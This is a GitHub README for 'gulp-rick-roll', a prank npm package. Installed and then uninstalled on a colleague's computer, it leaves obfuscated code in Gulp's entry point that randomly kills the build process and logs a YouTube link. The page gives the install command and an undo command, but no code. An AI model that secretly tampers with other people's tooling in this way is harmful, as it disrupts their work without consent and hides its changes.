crisbeto / gulp-rick-roll

Allows you to Rick roll your Gulp-using colleagues

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

gulp-rick-roll

Allows you to Rick roll your Gulp-using colleagues by finding the local entry point for Gulp, adding an obfuscated script that randomly exits the process early and occasionally logs a YouTube link.

Usage

On the colleague's computer, run the following inside your project root:

npm i gulp-rick-roll && npm uninstall gulp-rick-roll

Undoing it

If you want to undo the changes done by this plugin, you can reinstall Gulp:

npm uninstall gulp && npm i gulp

About

Allows you to Rick roll your Gulp-using colleagues

License:MIT License


Languages

Language:JavaScript 100.0%